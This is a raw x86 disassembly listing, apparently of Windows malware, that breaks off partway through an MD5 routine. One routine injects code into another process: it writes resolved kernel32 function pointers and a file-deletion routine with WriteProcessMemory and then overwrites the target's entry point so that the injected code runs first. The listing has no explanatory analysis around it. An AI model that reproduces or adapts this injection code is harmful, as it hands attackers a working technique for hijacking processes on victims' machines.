lea eax, [ebp+var_220]
push eax
call ds:dword_4E1980
test eax, eax
jnz short loc_4D744B
jmp short loc_4D7478
; ---------------------------------------------------------------------------
loc_4D744B: ; CODE XREF: sub_4D7333+F8�j
; sub_4D7333+114�j
push [ebp+var_10C]
call ds:dword_4E1984
jmp short loc_4D73FB
; ---------------------------------------------------------------------------
loc_4D7459: ; CODE XREF: sub_4D7333+E7�j
; sub_4D7333:loc_4D7478�j
cmp [ebp+var_10C], 0FFFFFFFFh
jz short loc_4D746E
push [ebp+var_10C]
call ds:dword_4E1984
loc_4D746E: ; CODE XREF: sub_4D7333+12D�j
push 0
call ds:dword_4E1990
jmp short loc_4D747A
; ---------------------------------------------------------------------------
loc_4D7478: ; CODE XREF: sub_4D7333+116�j
jmp short loc_4D7459
; ---------------------------------------------------------------------------
loc_4D747A: ; CODE XREF: sub_4D7333+143�j
pop edi
leave
retn
sub_4D7333 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D747D proc near ; DATA XREF: sub_4D7494+2B6�o
push ebp
mov ebp, esp
pop ebp
retn
sub_4D747D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D7482 proc near ; DATA XREF: sub_4D7494+2EF�o
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov eax, offset sub_4D7333
call eax ; sub_4D7333
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4D7482 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D7494 proc near ; CODE XREF: sub_4D71C3+107�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
push 0
call ds:dword_4E1718 ; GetModuleHandleA
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov ecx, [ebp+var_24]
add ecx, [eax+3Ch]
mov [ebp+var_20], ecx
mov eax, [ebp+arg_4]
mov ds:dword_4E1920, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E1920
push offset dword_4E1920
push [ebp+arg_0]
call ds:dword_4DE028 ; WriteProcessMemory
push 20h
pop ecx
xor eax, eax
mov edi, offset dword_4E19A0
rep stosd
call ds:dword_4E16E8 ; GetCurrentProcessId
push eax
push offset aMbx@X@_ ; "MBX@%X@*.###"
push offset dword_4E19A0
call ds:dword_4E17D4 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
push 80h
push offset dword_4E19A0
push offset dword_4E19A0
push [ebp+arg_0]
call ds:dword_4DE028 ; WriteProcessMemory
mov esi, offset aKernel32_dll ; "kernel32.dll"
lea edi, [ebp+var_10]
movsd
movsd
movsd
movsb
lea eax, [ebp+var_10]
push eax
push offset aGettemppatha ; "GetTempPathA"
call sub_4D9D79
pop ecx
pop ecx
mov ds:dword_4E1970, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E1970
push offset dword_4E1970
push [ebp+arg_0]
call ds:dword_4DE028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aSetcurrentdire ; "SetCurrentDirectoryA"
call sub_4D9D79
pop ecx
pop ecx
mov ds:dword_4E1974, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E1974
push offset dword_4E1974
push [ebp+arg_0]
call ds:dword_4DE028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aGetcurrentdire ; "GetCurrentDirectoryA"
call sub_4D9D79
pop ecx
pop ecx
mov ds:dword_4E1978, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E1978
push offset dword_4E1978
push [ebp+arg_0]
call ds:dword_4DE028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aFindfirstfilea ; "FindFirstFileA"
call sub_4D9D79
pop ecx
pop ecx
mov ds:dword_4E197C, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E197C
push offset dword_4E197C
push [ebp+arg_0]
call ds:dword_4DE028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aDeletefilea ; "DeleteFileA"
call sub_4D9D79
pop ecx
pop ecx
mov ds:dword_4E1980, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E1980
push offset dword_4E1980
push [ebp+arg_0]
call ds:dword_4DE028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aFindclose ; "FindClose"
call sub_4D9D79
pop ecx
pop ecx
mov ds:dword_4E1984, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E1984
push offset dword_4E1984
push [ebp+arg_0]
call ds:dword_4DE028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aGetexitcodepro ; "GetExitCodeProcess"
call sub_4D9D79
pop ecx
pop ecx
mov ds:dword_4E1988, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E1988
push offset dword_4E1988
push [ebp+arg_0]
call ds:dword_4DE028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aWaitforsingleo ; "WaitForSingleObject"
call sub_4D9D79
pop ecx
pop ecx
mov ds:dword_4E198C, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E198C
push offset dword_4E198C
push [ebp+arg_0]
call ds:dword_4DE028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aExitprocess ; "ExitProcess"
call sub_4D9D79
pop ecx
pop ecx
mov ds:dword_4E1990, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E1990
push offset dword_4E1990
push [ebp+arg_0]
call ds:dword_4DE028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aOpenprocess ; "OpenProcess"
call sub_4D9D79
pop ecx
pop ecx
mov ds:dword_4E1994, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E1994
push offset dword_4E1994
push [ebp+arg_0]
call ds:dword_4DE028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aSleep ; "Sleep"
call sub_4D9D79
pop ecx
pop ecx
mov ds:dword_4E1998, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E1998
push offset dword_4E1998
push [ebp+arg_0]
call ds:dword_4DE028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aClosehandle ; "CloseHandle"
call sub_4D9D79
pop ecx
pop ecx
mov ds:dword_4E199C, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E199C
push offset dword_4E199C
push [ebp+arg_0]
call ds:dword_4DE028 ; WriteProcessMemory
mov eax, offset sub_4D747D
sub eax, offset sub_4D7333
mov [ebp+var_1C], eax
lea eax, [ebp+var_14]
push eax
push [ebp+var_1C]
push offset sub_4D7333
push offset sub_4D7333
push [ebp+arg_0]
call ds:dword_4DE028 ; WriteProcessMemory
mov eax, [ebp+var_20]
mov ecx, [ebp+var_24]
add ecx, [eax+28h]
mov [ebp+var_18], ecx
lea eax, [ebp+var_14]
push eax
push 20h
push offset sub_4D7482
push [ebp+var_18]
push [ebp+arg_0]
call ds:dword_4DE028 ; WriteProcessMemory
pop edi
pop esi
leave
retn
sub_4D7494 endp
; =============== S U B R O U T I N E =======================================
sub_4D7798 proc near ; CODE XREF: _4:004CEECC�p
; sub_4D3610+209�p
push esi
mov esi, ecx
call sub_4D79B1
mov eax, esi
pop esi
retn
sub_4D7798 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D77A4 proc near ; CODE XREF: sub_4D3610+21D�p
; sub_4D785D+112�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, ecx
cmp byte ptr [ebx+68h], 0
jnz loc_4D7858
mov edx, [ebx+10h]
mov ecx, [ebp+arg_4]
push esi
mov eax, edx
mov esi, ecx
lea edx, [edx+ecx*8]
shr eax, 3
shl esi, 3
and eax, 3Fh
cmp edx, esi
push edi
mov [ebx+10h], edx
jnb short loc_4D77D7
inc dword ptr [ebx+14h]
loc_4D77D7: ; CODE XREF: sub_4D77A4+2E�j
mov edx, ecx
push 40h
shr edx, 1Dh
add [ebx+14h], edx
pop edx
sub edx, eax
cmp ecx, edx
mov [ebp+var_4], edx
jb short loc_4D783B
mov esi, [ebp+arg_0]
mov ecx, edx
lea edi, [eax+ebx+18h]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
lea eax, [ebx+18h]
and ecx, 3
push eax
rep movsb
mov ecx, ebx
call sub_4D79D8
mov esi, [ebp+var_4]
lea eax, [esi+3Fh]
cmp eax, [ebp+arg_4]
jnb short loc_4D7834
mov edi, eax
loc_4D781A: ; CODE XREF: sub_4D77A4+8E�j
mov eax, [ebp+arg_0]
mov ecx, ebx
lea eax, [eax+edi-3Fh]
push eax
call sub_4D79D8
add edi, 40h
add esi, 40h
cmp edi, [ebp+arg_4]
jb short loc_4D781A
loc_4D7834: ; CODE XREF: sub_4D77A4+72�j
mov ecx, [ebp+arg_4]
xor eax, eax
jmp short loc_4D783D
; ---------------------------------------------------------------------------
loc_4D783B: ; CODE XREF: sub_4D77A4+45�j
xor esi, esi
loc_4D783D: ; CODE XREF: sub_4D77A4+95�j
mov edx, [ebp+arg_0]
sub ecx, esi
lea edi, [eax+ebx+18h]
mov eax, ecx
add esi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
loc_4D7858: ; CODE XREF: sub_4D77A4+B�j
pop ebx
leave
retn 8
sub_4D77A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D785D proc near ; CODE XREF: sub_4D3610+22F�p
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = byte ptr -46h
var_45 = byte ptr -45h
var_44 = byte ptr -44h
var_43 = byte ptr -43h
var_42 = byte ptr -42h
var_41 = byte ptr -41h
var_40 = byte ptr -40h
var_3F = byte ptr -3Fh
var_3E = byte ptr -3Eh
var_3D = byte ptr -3Dh
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_36 = byte ptr -36h
var_35 = byte ptr -35h
var_34 = byte ptr -34h
var_33 = byte ptr -33h
var_32 = byte ptr -32h
var_31 = byte ptr -31h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_2D = byte ptr -2Dh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = byte ptr -2Ah
var_29 = byte ptr -29h
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
mov esi, ecx
xor ebx, ebx
push edi
mov [ebp+var_4], esi
cmp [esi+68h], bl
mov [ebp+var_4C], 80h
mov [ebp+var_4B], bl
mov [ebp+var_4A], bl
mov [ebp+var_49], bl
mov [ebp+var_48], bl
mov [ebp+var_47], bl
mov [ebp+var_46], bl
mov [ebp+var_45], bl
mov [ebp+var_44], bl
mov [ebp+var_43], bl
mov [ebp+var_42], bl
mov [ebp+var_41], bl
mov [ebp+var_40], bl
mov [ebp+var_3F], bl
mov [ebp+var_3E], bl
mov [ebp+var_3D], bl
mov [ebp+var_3C], bl
mov [ebp+var_3B], bl
mov [ebp+var_3A], bl
mov [ebp+var_39], bl
mov [ebp+var_38], bl
mov [ebp+var_37], bl
mov [ebp+var_36], bl
mov [ebp+var_35], bl
mov [ebp+var_34], bl
mov [ebp+var_33], bl
mov [ebp+var_32], bl
mov [ebp+var_31], bl
mov [ebp+var_30], bl
mov [ebp+var_2F], bl
mov [ebp+var_2E], bl
mov [ebp+var_2D], bl
mov [ebp+var_2C], bl
mov [ebp+var_2B], bl
mov [ebp+var_2A], bl
mov [ebp+var_29], bl
mov [ebp+var_28], bl
mov [ebp+var_27], bl
mov [ebp+var_26], bl
mov [ebp+var_25], bl
mov [ebp+var_24], bl
mov [ebp+var_23], bl
mov [ebp+var_22], bl
mov [ebp+var_21], bl
mov [ebp+var_20], bl
mov [ebp+var_1F], bl
mov [ebp+var_1E], bl
mov [ebp+var_1D], bl
mov [ebp+var_1C], bl
mov [ebp+var_1B], bl
mov [ebp+var_1A], bl
mov [ebp+var_19], bl
mov [ebp+var_18], bl
mov [ebp+var_17], bl
mov [ebp+var_16], bl
mov [ebp+var_15], bl
mov [ebp+var_14], bl
mov [ebp+var_13], bl
mov [ebp+var_12], bl
mov [ebp+var_11], bl
mov [ebp+var_10], bl
mov [ebp+var_F], bl
mov [ebp+var_E], bl
mov [ebp+var_D], bl
jz short loc_4D7943
mov edi, [ebp+arg_0]
cmp edi, ebx
jz short loc_4D79AA
add esi, 58h
movsd
movsd
movsd
movsd
jmp short loc_4D79AA
; ---------------------------------------------------------------------------
loc_4D7943: ; CODE XREF: sub_4D785D+D4�j
lea edi, [esi+10h]
push 8
lea eax, [ebp+var_C]
push edi
push eax
mov ecx, esi
call sub_4D82B3
mov eax, [edi]
push 38h
shr eax, 3
and eax, 3Fh
pop ecx
cmp eax, ecx
jb short loc_4D7966
push 78h
pop ecx
loc_4D7966: ; CODE XREF: sub_4D785D+104�j
sub ecx, eax
lea eax, [ebp+var_4C]
push ecx
push eax
mov ecx, esi
call sub_4D77A4
lea eax, [ebp+var_C]
push 8
push eax
mov ecx, esi
call sub_4D77A4
lea edi, [esi+58h]
push 10h
push esi
push edi
mov ecx, esi
call sub_4D82B3
cmp [ebp+arg_0], ebx
jz short loc_4D79A0
mov esi, edi
mov edi, [ebp+arg_0]
movsd
movsd
movsd
movsd
mov esi, [ebp+var_4]
loc_4D79A0: ; CODE XREF: sub_4D785D+135�j
xor eax, eax
lea edi, [esi+18h]
stosb
mov byte ptr [esi+68h], 1
loc_4D79AA: ; CODE XREF: sub_4D785D+DB�j
; sub_4D785D+E4�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_4D785D endp
; =============== S U B R O U T I N E =======================================
sub_4D79B1 proc near ; CODE XREF: sub_4D7798+3�p
xor eax, eax
mov dword ptr [ecx], 67452301h
mov [ecx+68h], al
mov [ecx+10h], eax
mov [ecx+14h], eax
mov dword ptr [ecx+4], 0EFCDAB89h
mov dword ptr [ecx+8], 98BADCFEh
mov dword ptr [ecx+0Ch], 10325476h
retn
sub_4D79B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D79D8 proc near ; CODE XREF: sub_4D77A4+64�p
; sub_4D77A4+80�p
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 50h
push ebx
push esi
mov esi, ecx
push edi
push 40h
mov eax, [esi]
push [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [esi+4]
mov [ebp+var_8], eax
mov eax, [esi+8]
mov [ebp+var_C], eax
mov eax, [esi+0Ch]
mov [ebp+var_10], eax
lea eax, [ebp+var_50]
push eax
call sub_4D82FA
mov edi, [ebp+var_8]
mov ebx, [ebp+var_C]
mov eax, edi
mov ecx, ebx
not eax
and eax, [ebp+var_10]
and ecx, edi
mov edx, edi
or eax, ecx
mov ecx, [ebp+var_4]
add eax, [ebp+var_50]
lea ecx, [ecx+eax-28955B88h]
mov eax, ecx
shr eax, 19h
shl ecx, 7
or eax, ecx
add eax, edi
mov ecx, eax
and edx, eax
not ecx
and ecx, ebx
or ecx, edx
mov edx, [ebp+var_10]
add ecx, [ebp+var_4C]
lea edx, [edx+ecx-173848AAh]
mov ecx, edx
shr ecx, 14h
shl edx, 0Ch
or ecx, edx
add ecx, eax
mov edx, ecx
not edx
and edx, edi
mov edi, ecx
and edi, eax
or edx, edi
add edx, [ebp+var_48]
lea edx, [ebx+edx+242070DBh]
mov ebx, ecx
mov edi, edx
shr edi, 0Fh
shl edx, 11h
or edi, edx
add edi, ecx
mov edx, edi
and ebx, edi
not edx
and edx, eax
mov [ebp+var_C], edi
or edx, ebx
mov ebx, [ebp+var_8]
add edx, [ebp+var_44]
lea ebx, [ebx+edx-3E423112h]
mov edx, ebx
shl edx, 16h
shr ebx, 0Ah
or edx, ebx
add edx, edi
mov ebx, edx
and edi, edx
not ebx
and ebx, ecx
or ebx, edi
add ebx, [ebp+var_40]
lea eax, [eax+ebx-0A83F051h]
mov edi, eax
shr edi, 19h
shl eax, 7
or edi, eax
mov eax, edx
add edi, edx
mov [ebp+var_4], edi
and eax, [ebp+var_4]
not edi
and edi, [ebp+var_C]
or edi, eax
add edi, [ebp+var_3C]
lea ecx, [ecx+edi+4787C62Ah]
mov eax, ecx
shr eax, 14h
shl ecx, 0Ch
or eax, ecx
add eax, [ebp+var_4]
mov ecx, eax
mov edi, eax
and edi, [ebp+var_4]
mov ebx, eax
not ecx
and ecx, edx
or ecx, edi
mov edi, [ebp+var_C]
add ecx, [ebp+var_38]
lea edi, [edi+ecx-57CFB9EDh]
mov ecx, edi
shr ecx, 0Fh
shl edi, 11h
or ecx, edi
add ecx, eax
mov edi, ecx
and ebx, ecx
not edi
and edi, [ebp+var_4]
or edi, ebx
mov ebx, ecx
add edi, [ebp+var_34]
lea edx, [edx+edi-2B96AFFh]
mov edi, edx
shl edi, 16h
shr edx, 0Ah
or edi, edx
add edi, ecx
mov edx, edi
and ebx, edi
not edx
and edx, eax
mov [ebp+var_8], edi
or edx, ebx
mov ebx, [ebp+var_4]
add edx, [ebp+var_30]
lea ebx, [ebx+edx+698098D8h]
mov edx, ebx
shr edx, 19h
shl ebx, 7
or edx, ebx
add edx, edi
mov ebx, edx
and edi, edx
not ebx
and ebx, ecx
or ebx, edi
add ebx, [ebp+var_2C]
lea eax, [eax+ebx-74BB0851h]
mov edi, eax
shr edi, 14h
shl eax, 0Ch
or edi, eax
add edi, edx
mov eax, edi
mov ebx, edi
not eax
and eax, [ebp+var_8]
and ebx, edx
or eax, ebx
add eax, [ebp+var_28]
lea ecx, [ecx+eax-0A44Fh]
mov ebx, ecx
shr ebx, 0Fh
shl ecx, 11h
or ebx, ecx
mov ecx, edi
add ebx, edi
mov eax, ebx
and ecx, ebx
not eax
and eax, edx
mov [ebp+var_C], ebx
or eax, ecx
mov ecx, [ebp+var_8]
add eax, [ebp+var_24]
lea ecx, [ecx+eax-76A32842h]
mov eax, ecx
shl eax, 16h
shr ecx, 0Ah
or eax, ecx
add eax, ebx
mov ecx, eax
and ebx, eax
not ecx
and ecx, edi
or ecx, ebx
add ecx, [ebp+var_20]
lea edx, [edx+ecx+6B901122h]
mov ecx, edx
shr ecx, 19h
shl edx, 7
or ecx, edx
mov edx, eax
add ecx, eax
mov [ebp+var_4], ecx
and edx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or ecx, edx
add ecx, [ebp+var_1C]
lea edi, [edi+ecx-2678E6Dh]
mov ecx, edi
shr ecx, 14h
shl edi, 0Ch
or ecx, edi
add ecx, [ebp+var_4]
mov [ebp+arg_0], ecx
mov edi, ecx
not [ebp+arg_0]
mov edx, [ebp+arg_0]
and edi, [ebp+var_4]
and edx, eax
mov ebx, ecx
or edx, edi
mov edi, [ebp+var_C]
add edx, [ebp+var_18]
lea edi, [edi+edx-5986BC72h]
mov edx, edi
shr edx, 0Fh
shl edi, 11h
or edx, edi
add edx, ecx
mov [ebp+var_10], edx
and ebx, edx
not [ebp+var_10]
mov edi, [ebp+var_10]
and edi, [ebp+var_4]
or edi, ebx
mov ebx, ecx
add edi, [ebp+var_14]
lea eax, [eax+edi+49B40821h]
mov edi, eax
shl edi, 16h
shr eax, 0Ah
or edi, eax
mov eax, [ebp+arg_0]
add edi, edx
and eax, edx
and ebx, edi
or eax, ebx
mov ebx, [ebp+var_4]
add eax, [ebp+var_4C]
lea eax, [ebx+eax-9E1DA9Eh]
mov ebx, eax
shr ebx, 1Bh
shl eax, 5
or ebx, eax
mov eax, [ebp+var_10]
and eax, edi
add ebx, edi
mov [ebp+arg_0], eax
mov eax, edx
and eax, ebx
mov [ebp+var_4], ebx
mov ebx, eax
mov eax, [ebp+arg_0]
or eax, ebx
add eax, [ebp+var_38]
lea ecx, [ecx+eax-3FBF4CC0h]
mov eax, ecx
shr eax, 17h
shl ecx, 9
or eax, ecx
mov ecx, edi
add eax, [ebp+var_4]
not ecx
and ecx, [ebp+var_4]
mov ebx, eax
and ebx, edi
or ecx, ebx
add ecx, [ebp+var_24]
lea edx, [edx+ecx+265E5A51h]
mov ecx, edx
shr ecx, 12h
shl edx, 0Eh
or ecx, edx
mov edx, [ebp+var_4]
add ecx, eax
mov [ebp+var_C], ecx
and ecx, [ebp+var_4]
not edx
and edx, eax
mov ebx, [ebp+var_C]
or edx, ecx
add edx, [ebp+var_50]
lea edi, [edi+edx-16493856h]
mov edx, eax
mov ecx, edi
shl ecx, 14h
shr edi, 0Ch
or ecx, edi
mov edi, eax
add ecx, ebx
not edx
and edx, ebx
and edi, ecx
or edx, edi
mov edi, [ebp+var_4]
add edx, [ebp+var_3C]
lea edx, [edi+edx-29D0EFA3h]
mov edi, edx
shr edi, 1Bh
shl edx, 5
or edi, edx
mov edx, ebx
add edi, ecx
mov [ebp+var_4], edi
mov edi, ebx
and edi, [ebp+var_4]
not edx
and edx, ecx
or edx, edi
add edx, [ebp+var_28]
lea eax, [eax+edx+2441453h]
mov edx, eax
shr edx, 17h
shl eax, 9
or edx, eax
mov eax, ecx
add edx, [ebp+var_4]
not eax
and eax, [ebp+var_4]
mov edi, edx
and edi, ecx
or eax, edi
add eax, [ebp+var_14]
lea edi, [ebx+eax-275E197Fh]
mov eax, edi
shr eax, 12h
shl edi, 0Eh
or eax, edi
mov edi, [ebp+var_4]
add eax, edx
mov ebx, eax
and ebx, [ebp+var_4]
not edi
and edi, edx
or edi, ebx
mov ebx, edx
add edi, [ebp+var_40]
lea ecx, [ecx+edi-182C0438h]
mov edi, ecx
shl edi, 14h
shr ecx, 0Ch
or edi, ecx
mov ecx, edx
add edi, eax
not ecx
and ecx, eax
and ebx, edi
or ecx, ebx
mov ebx, [ebp+var_4]
add ecx, [ebp+var_2C]
mov [ebp+var_8], edi
lea ebx, [ebx+ecx+21E1CDE6h]
mov ecx, ebx
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
mov ebx, eax
not ebx
add ecx, edi
and ebx, edi
mov edi, eax
and edi, ecx
or ebx, edi
add ebx, [ebp+var_18]
lea edx, [edx+ebx-3CC8F82Ah]
mov edi, edx
shr edi, 17h
shl edx, 9
or edi, edx
mov edx, [ebp+var_8]
add edi, ecx
mov ebx, edi
and ebx, [ebp+var_8]
not edx
and edx, ecx
or edx, ebx
add edx, [ebp+var_44]
lea eax, [eax+edx-0B2AF279h]
mov edx, eax
shr edx, 12h
shl eax, 0Eh
or edx, eax
mov eax, ecx
add edx, edi
not eax
mov ebx, edx
and eax, edi
and ebx, ecx
or eax, ebx
mov ebx, [ebp+var_8]
add eax, [ebp+var_30]
lea eax, [ebx+eax+455A14EDh]
mov ebx, eax
shl ebx, 14h
shr eax, 0Ch
or ebx, eax
mov eax, edi
add ebx, edx
mov [ebp+var_8], ebx
not eax
mov ebx, edi
and eax, edx
and ebx, [ebp+var_8]
or eax, ebx
add eax, [ebp+var_1C]
lea ecx, [ecx+eax-561C16FBh]
mov eax, ecx
shr eax, 1Bh
shl ecx, 5
or eax, ecx
mov ecx, edx
add eax, [ebp+var_8]
mov [ebp+var_4], eax
and ecx, [ebp+var_4]
mov eax, edx
mov ebx, [ebp+var_4]
not eax
and eax, [ebp+var_8]
or eax, ecx
mov ecx, [ebp+var_8]
add eax, [ebp+var_48]
not ecx
and ecx, ebx
lea edi, [edi+eax-3105C08h]
mov eax, edi
shr eax, 17h
shl edi, 9
or eax, edi
add eax, ebx
mov edi, eax
and edi, [ebp+var_8]
or ecx, edi
add ecx, [ebp+var_34]
lea edx, [edx+ecx+676F02D9h]
mov ecx, edx
shr ecx, 12h
shl edx, 0Eh
or ecx, edx
mov edx, ebx
add ecx, eax
not edx
mov edi, ecx
and edx, eax
and edi, ebx
or edx, edi
mov edi, [ebp+var_8]
add edx, [ebp+var_20]
lea edi, [edi+edx-72D5B376h]
mov edx, edi
shl edx, 14h
shr edi, 0Ch
or edx, edi
mov edi, eax
add edx, ecx
xor edi, ecx
xor edi, edx
add edi, [ebp+var_3C]
lea ebx, [ebx+edi-5C6BEh]
mov edi, ebx
shr edi, 1Ch
shl ebx, 4
or edi, ebx
mov ebx, ecx
add edi, edx
xor ebx, edx
xor ebx, edi
add ebx, [ebp+var_30]
lea eax, [eax+ebx-788E097Fh]
mov ebx, eax
shr ebx, 15h
shl eax, 0Bh
or ebx, eax
add ebx, edi
mov eax, ebx
xor eax, edx
xor eax, edi
add eax, [ebp+var_24]
lea ecx, [ecx+eax+6D9D6122h]
mov eax, ecx
shr eax, 10h
shl ecx, 10h
or eax, ecx
mov ecx, ebx
add eax, ebx
xor ecx, eax
mov [ebp+var_C], eax
mov eax, ecx
xor eax, edi
add eax, [ebp+var_18]
lea edx, [edx+eax-21AC7F4h]
mov eax, edx
shl eax, 17h
shr edx, 9
or eax, edx
add eax, [ebp+var_C]
xor ecx, eax
add ecx, [ebp+var_4C]
lea edi, [edi+ecx-5B4115BCh]
mov ecx, edi
shr ecx, 1Ch
shl edi, 4
or ecx, edi
mov edi, [ebp+var_C]
mov edx, edi
add ecx, eax
xor edx, eax
xor edx, ecx
add edx, [ebp+var_40]
lea ebx, [ebx+edx+4BDECFA9h]
mov edx, ebx
shr edx, 15h
shl ebx, 0Bh
or edx, ebx
add edx, ecx
mov ebx, edx
mov [ebp+arg_0], edx
xor ebx, eax
xor ebx, ecx
add ebx, [ebp+var_34]
lea ebx, [edi+ebx-944B4A0h]
mov edi, ebx
shr edi, 10h
shl ebx, 10h
or edi, ebx
add edi, edx
xor [ebp+arg_0], edi
mov ebx, [ebp+arg_0]
xor ebx, ecx
add ebx, [ebp+var_28]
lea ebx, [eax+ebx-41404390h]
mov eax, ebx
shl eax, 17h
shr ebx, 9
or eax, ebx
mov ebx, [ebp+arg_0]
add eax, edi
xor ebx, eax
add ebx, [ebp+var_1C]
lea ebx, [ecx+ebx+289B7EC6h]
mov ecx, ebx
shr ecx, 1Ch
shl ebx, 4
or ecx, ebx
mov ebx, edi
add ecx, eax
xor ebx, eax
xor ebx, ecx
add ebx, [ebp+var_50]
lea edx, [edx+ebx-155ED806h]
mov ebx, edx
shr ebx, 15h
shl edx, 0Bh
or ebx, edx
add ebx, ecx
mov edx, ebx
xor edx, eax
xor edx, ecx
add edx, [ebp+var_44]
lea edx, [edi+edx-2B10CF7Bh]
mov edi, edx
shr edi, 10h
shl edx, 10h
or edi, edx
mov [ebp+arg_0], ebx
add edi, ebx
xor [ebp+arg_0], edi
mov edx, [ebp+arg_0]
xor edx, ecx
add edx, [ebp+var_38]
lea edx, [eax+edx+4881D05h]
mov eax, edx
shl eax, 17h
shr edx, 9
or eax, edx
mov edx, [ebp+arg_0]
add eax, edi
xor edx, eax
add edx, [ebp+var_2C]
lea edx, [ecx+edx-262B2FC7h]
mov ecx, edx
shr ecx, 1Ch
shl edx, 4
or ecx, edx
mov edx, edi
xor edx, eax
add ecx, eax
xor edx, ecx
add edx, [ebp+var_20]
lea ebx, [ebx+edx-1924661Bh]
mov edx, ebx
shr edx, 15h
shl ebx, 0Bh
or edx, ebx
add edx, ecx
mov ebx, edx
xor ebx, eax
xor ebx, ecx
add ebx, [ebp+var_14]
lea ebx, [edi+ebx+1FA27CF8h]
mov edi, ebx
shr edi, 10h
shl ebx, 10h
or edi, ebx
mov ebx, edx
add edi, edx
xor ebx, edi
xor ebx, ecx
add ebx, [ebp+var_48]
lea eax, [eax+ebx-3B53A99Bh]
mov ebx, eax
shl ebx, 17h
shr eax, 9
or ebx, eax
mov eax, edx
add ebx, edi
not eax
or eax, ebx
xor eax, edi
add eax, [ebp+var_50]
lea eax, [ecx+eax-0BD6DDBCh]
mov ecx, eax
shr ecx, 1Ah
shl eax, 6
or ecx, eax
mov eax, edi
add ecx, ebx
not eax
or eax, ecx
xor eax, ebx
add eax, [ebp+var_34]
lea eax, [edx+eax+432AFF97h]
mov edx, eax
